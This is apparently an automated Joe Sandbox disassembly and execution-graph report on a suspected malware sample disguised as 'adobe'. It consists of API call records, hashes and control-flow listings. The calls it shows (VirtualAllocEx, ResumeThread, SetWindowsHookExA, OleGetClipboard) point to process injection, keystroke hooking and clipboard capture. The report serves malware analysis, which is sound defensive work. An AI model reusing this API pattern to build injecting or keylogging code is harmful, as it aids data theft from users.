                        • Instruction Fuzzy Hash: FA1189728002499FCB20DFAAC845BEFBFF5EF48324F248819E559A7250C7359541CFA1
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0127B079,00000800,00000000,00000000), ref: 0127B28A
                        Memory Dump Source
                        • Source File: 00000006.00000002.1871782609.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1270000_adobe.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 5cafec2e4ce7149c1db8cbc73da94697063dc8583b145bbb5dbadba5f1c495ec
                        • Instruction ID: 59d29bd787f421ccd332c42981cc55e5bb9b4f18398b6b566d7f681cf413d322
                        • Opcode Fuzzy Hash: 5cafec2e4ce7149c1db8cbc73da94697063dc8583b145bbb5dbadba5f1c495ec
                        • Instruction Fuzzy Hash: 301114B69013098FDB10CF9AC444ADFFBF4EB48310F10842AD919A7210C375A545CFA5
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0127B079,00000800,00000000,00000000), ref: 0127B28A
                        Memory Dump Source
                        • Source File: 00000006.00000002.1871782609.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1270000_adobe.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 4d41233f61e175d44b782601bc0ae45f584b1cfe24b2e40fef120a25dbcd4344
                        • Instruction ID: c400e0d46ed85a8a825207c46239a930bcdd435afd15a3949c9bf7feb698cb2d
                        • Opcode Fuzzy Hash: 4d41233f61e175d44b782601bc0ae45f584b1cfe24b2e40fef120a25dbcd4344
                        • Instruction Fuzzy Hash: 6F111FB69012498FDB10DFAAC444ADEFBF4EB89320F10842AD969A7610C375A945CFA5
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02B1942E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: fef089544e45f1314bc96c9dbcf5f81afc0fa13b7329e8abdf1d5e236ac309ae
                        • Instruction ID: 008ff1e3ffed9d647d643fc4ca461fa7a6621b8b74145db28ddd6b8c4d5b29ad
                        • Opcode Fuzzy Hash: fef089544e45f1314bc96c9dbcf5f81afc0fa13b7329e8abdf1d5e236ac309ae
                        • Instruction Fuzzy Hash: 951167729002498FCB20DFAAC845BDFBFF5EF88324F248419E559A7250C775A540CFA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: db7bbfea1b6c2990ee3bf2047e71da83e32a51e5085d97ae2a39a579dffd9180
                        • Instruction ID: e799e9cb3c144d65edce9f0d4b2ed30b04d6734ad61b9c387788dc0c51fa6154
                        • Opcode Fuzzy Hash: db7bbfea1b6c2990ee3bf2047e71da83e32a51e5085d97ae2a39a579dffd9180
                        • Instruction Fuzzy Hash: C01158B29002498FDB20DFAAC4457EFFBF4EB88324F248869D459A7240D775A945CFA4
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 33c13cbe1cb4d61f8e23c99dbca95fb19b66409e7a8b11e129c3874f18d00c2d
                        • Instruction ID: 3f4fcb2ee6096d6c3714a9ec0e0dc19f75b20132e1729d0b160805d038d918ec
                        • Opcode Fuzzy Hash: 33c13cbe1cb4d61f8e23c99dbca95fb19b66409e7a8b11e129c3874f18d00c2d
                        • Instruction Fuzzy Hash: C11136B29003498FDB20DFAAC4457EFFBF5EB88324F208429D459A7250CB75A944CFA5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 02B1BB2D
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 64ccf5c1eb2ca3ab473904f79a60121236c28ef910a0636b04b80080db44fed0
                        • Instruction ID: 00eb960371e9805bea636680c28fe7895265211e4a9a7b3c7181b7c5f79977d7
                        • Opcode Fuzzy Hash: 64ccf5c1eb2ca3ab473904f79a60121236c28ef910a0636b04b80080db44fed0
                        • Instruction Fuzzy Hash: 6E1122B58003489FCB10DF8AD889BDEFBF8EB48324F10845AE858A3600C375A584CFA1
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0127AFFE
                        Memory Dump Source
                        • Source File: 00000006.00000002.1871782609.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1270000_adobe.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 53bef71a9e67e320f300a4dd95766a6932134f20961d53fed261d3f2d95147bd
                        • Instruction ID: 7ccace0da5282fc0f803f7e05885c19c3005e1f141a827bb7f6b469d3c5304ab
                        • Opcode Fuzzy Hash: 53bef71a9e67e320f300a4dd95766a6932134f20961d53fed261d3f2d95147bd
                        • Instruction Fuzzy Hash: 6D111DB6C002498FDB20CF9AC444BDEFBF4AB88324F10842AD969A7210D379A545CFA1
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 02B1D838
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: d0c45ffb5cdc300006866e54b5f577b8a91e8309fa0176d53f92b51d9e2e03ce
                        • Instruction ID: e22a4f50a7d1e949cc35900b0d1aa4e2761a13c9e5aa9ba9ecbc5632a724dfbf
                        • Opcode Fuzzy Hash: d0c45ffb5cdc300006866e54b5f577b8a91e8309fa0176d53f92b51d9e2e03ce
                        • Instruction Fuzzy Hash: 031133B1800249CFCB10DF9AC544BDEBBF4EB48324F20846AD958A7240C338A584CFA5
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 02B1D838
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: ac8fe8bbff85f95bb5425253b4f457679687455a363894fe9782e802a44b8c3a
                        • Instruction ID: 8c904398001767229652f2d6d5d9bf829efeac577b9288f547a3a75d8f323aba
                        • Opcode Fuzzy Hash: ac8fe8bbff85f95bb5425253b4f457679687455a363894fe9782e802a44b8c3a
                        • Instruction Fuzzy Hash: 211136B2C00249CFDB10DF99C544BDEFBF0EB48324F10845AD558A7650C339A585CFA5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 02B1BB2D
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: a247e33d63a7a58d6cbce279489c504449d83e2d7f600cc8ef35290c1a6e5c18
                        • Instruction ID: bf76957bd9db48b0e0d5f50d4b9ee3cdb7c5629adab82c2f0b8670de4c5c18c7
                        • Opcode Fuzzy Hash: a247e33d63a7a58d6cbce279489c504449d83e2d7f600cc8ef35290c1a6e5c18
                        • Instruction Fuzzy Hash: CA11F2B5800349DFDB10DF9AD485BEEFBF8EB48324F208459E959A7600C375A984CFA5
                        Memory Dump Source
                        • Source File: 00000006.00000002.1868101142.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_d8d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f40f9de9020557db0fdba84450a55f19ecd0afe079828cff489f2dc24d5cfa60
                        • Instruction ID: e1abffe5b6ae440c54162c958e89b58b7f7539a6ffa11bc8ff5ec7f7eb5db8a2
                        • Opcode Fuzzy Hash: f40f9de9020557db0fdba84450a55f19ecd0afe079828cff489f2dc24d5cfa60
                        • Instruction Fuzzy Hash: B6212871500204DFDB05EF18D9C0B26BF66FB94324F24C169D9094B2D6C336E856C7B1
                        Memory Dump Source
                        • Source File: 00000006.00000002.1868136982.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_d9d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6178c6b9decd89b822afd1e48aed5beaf650755b4cb20b8d28a3cc37a8f99482
                        • Instruction ID: 4c88d48df9d49e3499ccab148cd16c5857a294fa060f2b72bfcf792743243e90
                        • Opcode Fuzzy Hash: 6178c6b9decd89b822afd1e48aed5beaf650755b4cb20b8d28a3cc37a8f99482
                        • Instruction Fuzzy Hash: CA21FF71604200DFDF14DF24D984B26BBA6FB88314F24C669E84E4B296C33AD847CA71
                        Memory Dump Source
                        • Source File: 00000006.00000002.1868136982.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_d9d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f2f9859fc5aaaf07be3e73b243aee3e65564a3c7bf0201216c5ab4d5aa655a7d
                        • Instruction ID: 560d0c1eb95f5d4edc41dc7daf7e25bbf5bbac3a745e1e9b37cfddcd67458da1
                        • Opcode Fuzzy Hash: f2f9859fc5aaaf07be3e73b243aee3e65564a3c7bf0201216c5ab4d5aa655a7d
                        • Instruction Fuzzy Hash: 06210471504200EFDF05DF14DAC0B2ABBA6FB84314F24C66DE9494B296C336D846CA75
                        Memory Dump Source
                        • Source File: 00000006.00000002.1868136982.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_d9d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 60eea47fd86717dc985f13cac6388d71597a140dcbf15b7a5b6af607c32ee616
                        • Instruction ID: b48549c2ddacd86f72be73a2706353f6a4c860a14c53b01b1e07b2b5e9d24ef9
                        • Opcode Fuzzy Hash: 60eea47fd86717dc985f13cac6388d71597a140dcbf15b7a5b6af607c32ee616
                        • Instruction Fuzzy Hash: DC215E755093808FDB16CF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                        Memory Dump Source
                        • Source File: 00000006.00000002.1868101142.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_d8d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction ID: 9c6cc4a5cc4e047525d37f4c28b8d773c46abf5c3abbf1e23a1500b95479de56
                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction Fuzzy Hash: 92112672404240DFCB02DF04D5C4B16BF72FB94324F28C2A9DC090B296C33AE85ACBA1
                        Memory Dump Source
                        • Source File: 00000006.00000002.1868136982.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_d9d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                        • Instruction ID: b97cb94ab9312380e2a6ed81380da5a595f1121ad4d0e70096b292b1de9a3e1c
                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                        • Instruction Fuzzy Hash: 90118B75504280DFDB16CF14D5C4B15BBA2FB94314F28C6AAD8494B696C33AD84ACB61
                        Memory Dump Source
                        • Source File: 00000006.00000002.1868101142.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_d8d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5148e0f09c61bc876924e59f1acbd6ea1d68896c3b0be97234cdd8d0485d5c25
                        • Instruction ID: 5068d95b753ee95af4550aca1a314397800e09a33e0b7345f19f5d1f360f567f
                        • Opcode Fuzzy Hash: 5148e0f09c61bc876924e59f1acbd6ea1d68896c3b0be97234cdd8d0485d5c25
                        • Instruction Fuzzy Hash: 6501A771009344AAE710AB26CD84767BFD9EF51324F1CC92AED4A4A2C6C779DC40C7B1
                        Memory Dump Source
                        • Source File: 00000006.00000002.1868101142.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_d8d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 754cf8661c77d68ebb7431114765adbe79f06d79cf8e762d2dbb4f8e030c6d9f
                        • Instruction ID: ade329c3c22d452e96dc44c905fbb1dbbda357bb534dad9db0a063962b304999
                        • Opcode Fuzzy Hash: 754cf8661c77d68ebb7431114765adbe79f06d79cf8e762d2dbb4f8e030c6d9f
                        • Instruction Fuzzy Hash: 6AF06271405344AEE7109B16DC84B66FFA8EF51724F18C55AED494A2C6C3799C44CBB1

                        Execution Graph

                        Execution Coverage:11.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:211
                        Total number of Limit Nodes:23
                        execution_graph 39682 669a2c8 39684 669a30c SetWindowsHookExA 39682->39684 39685 669a352 39684->39685 39931 6692e58 39932 6692e5e CreateWindowExW 39931->39932 39934 6692f7c 39932->39934 39934->39934 39935 6696a98 DuplicateHandle 39936 6696b2e 39935->39936 39686 6691daa 39687 6691db0 GetModuleHandleW 39686->39687 39689 6691e25 39687->39689 39690 6697c20 39691 6697c28 39690->39691 39693 6697c4b 39691->39693 39694 66966ec 39691->39694 39695 6697c60 KiUserCallbackDispatcher 39694->39695 39697 6697cce 39695->39697 39697->39691 39698 66984e0 39699 66984e6 39698->39699 39701 66984fb 39699->39701 39702 6696834 39699->39702 39703 6698530 OleInitialize 39702->39703 39704 6698594 39703->39704 39704->39701 39705 e10848 39707 e1084e 39705->39707 39706 e1091b 39707->39706 39710 e11358 39707->39710 39717 e1147f 39707->39717 39712 e11366 39710->39712 39711 e1147a 39711->39707 39712->39711 39713 e1147f 3 API calls 39712->39713 39725 e1fb80 39712->39725 39729 e1fb90 39712->39729 39733 e18219 39712->39733 39713->39712 39718 e1148b 39717->39718 39720 e11366 39717->39720 39718->39707 39719 e1147a 39719->39707 39720->39719 39721 e18219 2 API calls 39720->39721 39722 e1fb80 GetModuleHandleW 39720->39722 39723 e1fb90 GetModuleHandleW 39720->39723 39724 e1147f 3 API calls 39720->39724 39721->39720 39722->39720 39723->39720 39724->39720 39726 e1fba2 39725->39726 39728 e1fc19 39726->39728 39739 e1f2bc 39726->39739 39728->39712 39730 e1fba2 39729->39730 39731 e1f2bc GetModuleHandleW 39730->39731 39732 e1fc19 39730->39732 39731->39732 39732->39712 39734 e18223 39733->39734 39735 e182d9 39734->39735 39756 66af8e8 39734->39756 39761 66afb27 39734->39761 39772 66af8d9 39734->39772 39735->39712 39740 e1f2c7 39739->39740 39744 6690f88 39740->39744 39748 6690f73 39740->39748 39741 e1fdfa 39741->39728 39745 6690fb3 39744->39745 39747 6691062 39745->39747 39752 669039c 39745->39752 39749 6690f88 39748->39749 39750 669039c GetModuleHandleW 39749->39750 39751 6691062 39749->39751 39750->39751 39754 6691db0 GetModuleHandleW 39752->39754 39755 6691e25 39754->39755 39755->39747 39758 66af8fd 39756->39758 39757 66afb12 39757->39735 39758->39757 39759 66afd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 39758->39759 39760 66afb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 39758->39760 39759->39758 39760->39758 39762 66afac9 39761->39762 39765 66afb36 39761->39765 39762->39765 39766 66af8fd 39762->39766 39763 66afbd0 39763->39735 39764 66afb12 39764->39735 39765->39763 39777 e1ed08 39765->39777 39780 e1ecfb 39765->39780 39766->39764 39768 66afb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 39766->39768 39769 66afd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 39766->39769 39767 66afc9e 39767->39735 39768->39766 39769->39766 39774 66af8fd 39772->39774 39773 66afb12 39773->39735 39774->39773 39775 66afb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 39774->39775 39776 66afd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 39774->39776 39775->39774 39776->39774 39784 e1ed30 39777->39784 39778 e1ed16 39778->39767 39781 e1ed08 39780->39781 39783 e1ed30 2 API calls 39781->39783 39782 e1ed16 39782->39767 39783->39782 39785 e1ed75 39784->39785 39786 e1ed4d 39784->39786 39792 e1ed30 GlobalMemoryStatusEx 39785->39792 39794 e1ee18 39785->39794 39786->39778 39787 e1ed96 39787->39778 39788 e1edfb 39788->39778 39789 e1ed92 39789->39787 39789->39788 39790 e1ee5e GlobalMemoryStatusEx 39789->39790 39791 e1ee8e 39790->39791 39791->39778 39792->39789 39795 e1ee5e GlobalMemoryStatusEx 39794->39795 39796 e1ee8e 39795->39796 39796->39789 39797 dcd030 39798 dcd048 39797->39798 39799 dcd0a2 39798->39799 39807 669170c 39798->39807 39815 6693002 39798->39815 39821 6697673 39798->39821 39830 6693010 39798->39830 39836 6693130 39798->39836 39840 669769e 39798->39840 39848 66916fc 39798->39848 39808 6691717 39807->39808 39809 6697701 39808->39809 39811 66976f1 39808->39811 39864 6696694 39809->39864 39852 6697828 39811->39852 39858 6697818 39811->39858 39812 66976ff 39816 6693010 39815->39816 39817 66916fc GetModuleHandleW 39816->39817 39818 6693042 39817->39818 39819 669170c 2 API calls 39818->39819 39820 6693057 39819->39820 39820->39799 39825 669767a 39821->39825 39822 669767c 39822->39799 39823 6697701 39824 6696694 2 API calls 39823->39824 39827 66976ff 39824->39827 39825->39822 39825->39823 39826 66976f1 39825->39826 39828 6697828 2 API calls 39826->39828 39829 6697818 2 API calls 39826->39829 39828->39827 39829->39827 39835 6693016 39830->39835 39831 66916fc GetModuleHandleW 39832 6693042 39831->39832 39833 669170c 2 API calls 39832->39833 39834 6693057 39833->39834 39834->39799 39835->39831 39837 6693140 39836->39837 39927 6691734 39837->39927 39839 6693147 39839->39799 39841 66976a0 39840->39841 39842 6697701 39841->39842 39844 66976f1 39841->39844 39843 6696694 2 API calls 39842->39843 39845 66976ff 39843->39845 39846 6697828 2 API calls 39844->39846 39847 6697818 2 API calls 39844->39847 39846->39845 39847->39845 39849 6691707 39848->39849 39850 6691734 GetModuleHandleW 39849->39850 39851 6693147 39850->39851 39851->39799 39853 6697836 39852->39853 39854 6696694 2 API calls 39853->39854 39855 669790e 39853->39855 39871 6697cf1 39853->39871 39876 6697d00 39853->39876 39854->39853 39855->39812 39859 669781c 39858->39859 39860 6696694 2 API calls 39859->39860 39861 669790e 39859->39861 39862 6697cf1 OleGetClipboard 39859->39862 39863 6697d00 OleGetClipboard 39859->39863 39860->39859 39861->39812 39862->39859 39863->39859 39865 669669f 39864->39865 39866 669796a 39865->39866 39867 6697a14 39865->39867 39869 66979c2 CallWindowProcW 39866->39869 39870 6697971 39866->39870 39868 669170c OleGetClipboard 39867->39868 39868->39870 39869->39870 39870->39812 39872 6697cf4 39871->39872 39873 6697ce6 39872->39873 39881 6698298 39872->39881 39887 66982c0 39872->39887 39873->39853 39877 6697d1f 39876->39877 39878 6697d8a 39877->39878 39879 6698298 OleGetClipboard 39877->39879 39880 66982c0 OleGetClipboard 39877->39880 39878->39853 39879->39877 39880->39877 39883 669829d 39881->39883 39882 6698215 39882->39872 39883->39882 39893 6698308 39883->39893 39904 66982fb 39883->39904 39884 66982f1 39884->39872 39888 66982c8 39887->39888 39889 66982dc 39888->39889 39891 6698308 OleGetClipboard 39888->39891 39892 66982fb OleGetClipboard 39888->39892 39889->39872 39890 66982f1 39890->39872 39891->39890 39892->39890 39894 669831a 39893->39894 39895 6698335 39894->39895 39897 6698379 39894->39897 39900 6698308 OleGetClipboard 39895->39900 39901 66982fb OleGetClipboard 39895->39901 39896 669833b 39896->39884 39899 66983f9 39897->39899 39915 66985c0 39897->39915 39919 66985d0 39897->39919 39898 6698417 39898->39884 39899->39884 39900->39896 39901->39896 39905 6698302 39904->39905 39906 6698335 39905->39906 39908 6698379 39905->39908 39911 6698308 OleGetClipboard 39906->39911 39912 66982fb OleGetClipboard 39906->39912 39907 669833b 39907->39884 39910 66983f9 39908->39910 39913 66985c0 OleGetClipboard 39908->39913 39914 66985d0 OleGetClipboard 39908->39914 39909 6698417 39909->39884 39910->39884 39911->39907 39912->39907 39913->39909 39914->39909 39917 66985d0 39915->39917 39918 669860b 39917->39918 39923 66980a8 39917->39923 39918->39898 39921 66985e5 39919->39921 39920 66980a8 OleGetClipboard 39920->39921 39921->39920 39922 669860b 39921->39922 39922->39898 39924 6698678 OleGetClipboard 39923->39924 39926 6698712 39924->39926 39928 669173f 39927->39928 39929 669039c GetModuleHandleW 39928->39929 39930 6693217 39928->39930 39929->39930

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 124 66a3418-66a3439 125 66a343b-66a343e 124->125 126 66a3440-66a345f 125->126 127 66a3464-66a3467 125->127 126->127 128 66a3c08-66a3c0a 127->128 129 66a346d-66a348c 127->129 130 66a3c0c 128->130 131 66a3c11-66a3c14 128->131 137 66a348e-66a3491 129->137 138 66a34a5-66a34af 129->138 130->131 131->125 133 66a3c1a-66a3c23 131->133 137->138 139 66a3493-66a34a3 137->139 141 66a34b5-66a34c4 138->141 139->141 253 66a34c6 call 66a3c38 141->253 254 66a34c6 call 66a3c30 141->254 143 66a34cb-66a34d0 144 66a34dd-66a37ba 143->144 145 66a34d2-66a34d8 143->145 166 66a3bfa-66a3c07 144->166 167 66a37c0-66a386f 144->167 145->133 176 66a3898 167->176 177 66a3871-66a3896 167->177 179 66a38a1-66a38b4 call 66a2368 176->179 177->179 182 66a38ba-66a38dc call 66a2374 179->182 183 66a3be1-66a3bed 179->183 182->183 187 66a38e2-66a38ec 182->187 183->167 184 66a3bf3 183->184 184->166 187->183 188 66a38f2-66a38fd 187->188 188->183 189 66a3903-66a39d9 188->189 201 66a39db-66a39dd 189->201 202 66a39e7-66a3a17 189->202 201->202 206 66a3a19-66a3a1b 202->206 207 66a3a25-66a3a31 202->207 206->207 208 66a3a33-66a3a37 207->208 209 66a3a91-66a3a95 207->209 208->209 212 66a3a39-66a3a63 208->212 210 66a3a9b-66a3ad7 209->210 211 66a3bd2-66a3bdb 209->211 224 66a3ad9-66a3adb 210->224 225 66a3ae5-66a3af3 210->225 211->183 211->189 219 66a3a71-66a3a8e call 66a2380 212->219 220 66a3a65-66a3a67 212->220 219->209 220->219 224->225 227 66a3b0a-66a3b15 225->227 228 66a3af5-66a3b00 225->228 232 66a3b2d-66a3b3e 227->232 233 66a3b17-66a3b1d 227->233 228->227 231 66a3b02 228->231 231->227 237 66a3b40-66a3b46 232->237 238 66a3b56-66a3b62 232->238 234 66a3b1f 233->234 235 66a3b21-66a3b23 233->235 234->232 235->232 239 66a3b4a-66a3b4c 237->239 240 66a3b48 237->240 242 66a3b7a-66a3bcb 238->242 243 66a3b64-66a3b6a 238->243 239->238 240->238 242->211 244 66a3b6e-66a3b70 243->244 245 66a3b6c 243->245 244->242 245->242 253->143 254->143
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-2392861976
                        • Opcode ID: 641fae3c90bc6583b4caa0d783bac501f790c8d2e9d8dc210ce11ee0aa025c4b
                        • Instruction ID: 4cb78cba19cdb558d5631ad479a9756b2cdc8a2a635940e3519d5c1c215a5323
                        • Opcode Fuzzy Hash: 641fae3c90bc6583b4caa0d783bac501f790c8d2e9d8dc210ce11ee0aa025c4b
                        • Instruction Fuzzy Hash: 80321D31E1071A8FCB54EF75C85459DB7B6BF89300F2486AAD409AB324EB70AD85CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 823 66a7cf8-66a7d16 824 66a7d18-66a7d1b 823->824 825 66a7d3e-66a7d41 824->825 826 66a7d1d-66a7d39 824->826 827 66a7d4e-66a7d51 825->827 828 66a7d43-66a7d4d 825->828 826->825 830 66a7d68-66a7d6b 827->830 831 66a7d53-66a7d61 827->831 832 66a7d8c-66a7d8e 830->832 833 66a7d6d-66a7d87 830->833 838 66a7d9e-66a7db4 831->838 839 66a7d63 831->839 835 66a7d90 832->835 836 66a7d95-66a7d98 832->836 833->832 835->836 836->824 836->838 843 66a7dba-66a7dc3 838->843 844 66a7fcf-66a7fd9 838->844 839->830 845 66a7fda-66a800f 843->845 846 66a7dc9-66a7de6 843->846 849 66a8011-66a8014 845->849 853 66a7fbc-66a7fc9 846->853 854 66a7dec-66a7e14 846->854 851 66a801a-66a8026 849->851 852 66a80c1-66a80c4 849->852 859 66a8031-66a8033 851->859 855 66a80c6-66a80e2 852->855 856 66a80e7-66a80ea 852->856 853->843 853->844 854->853 879 66a7e1a-66a7e23 854->879 855->856 857 66a831f-66a8321 856->857 858 66a80f0-66a80ff 856->858 863 66a8328-66a832b 857->863 864 66a8323 857->864 874 66a811e-66a8162 858->874 875 66a8101-66a811c 858->875 861 66a804b-66a804f 859->861 862 66a8035-66a803b 859->862 870 66a805d 861->870 871 66a8051-66a805b 861->871 867 66a803f-66a8041 862->867 868 66a803d 862->868 863->849 869 66a8331-66a833a 863->869 864->863 867->861 868->861 872 66a8062-66a8064 870->872 871->872 877 66a807b-66a80b4 872->877 878 66a8066-66a8069 872->878 884 66a8168-66a8179 874->884 885 66a82f3-66a8309 874->885 875->874 877->858 903 66a80b6-66a80c0 877->903 878->869 879->845 881 66a7e29-66a7e45 879->881 891 66a7faa-66a7fb6 881->891 892 66a7e4b-66a7e75 881->892 893 66a82de-66a82ed 884->893 894 66a817f-66a819c 884->894 885->857 891->853 891->879 906 66a7e7b-66a7ea3 892->906 907 66a7fa0-66a7fa5 892->907 893->884 893->885 894->893 905 66a81a2-66a8298 call 66a6510 894->905 956 66a829a-66a82a4 905->956 957 66a82a6 905->957 906->907 913 66a7ea9-66a7ed7 906->913 907->891 913->907 919 66a7edd-66a7ee6 913->919 919->907 921 66a7eec-66a7f1e 919->921 928 66a7f29-66a7f45 921->928 929 66a7f20-66a7f24 921->929 928->891 931 66a7f47-66a7f9e call 66a6510 928->931 929->907 930 66a7f26 929->930 930->928 931->891 958 66a82ab-66a82ad 956->958 957->958 958->893 959 66a82af-66a82b4 958->959 960 66a82c2 959->960 961 66a82b6-66a82c0 959->961 962 66a82c7-66a82c9 960->962 961->962 962->893 963 66a82cb-66a82d7 962->963 963->893
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q
                        • API String ID: 0-355816377
                        • Opcode ID: 1616f710e475809a88385e214bcc51316eee36bb7eaad3b473108d6342560449
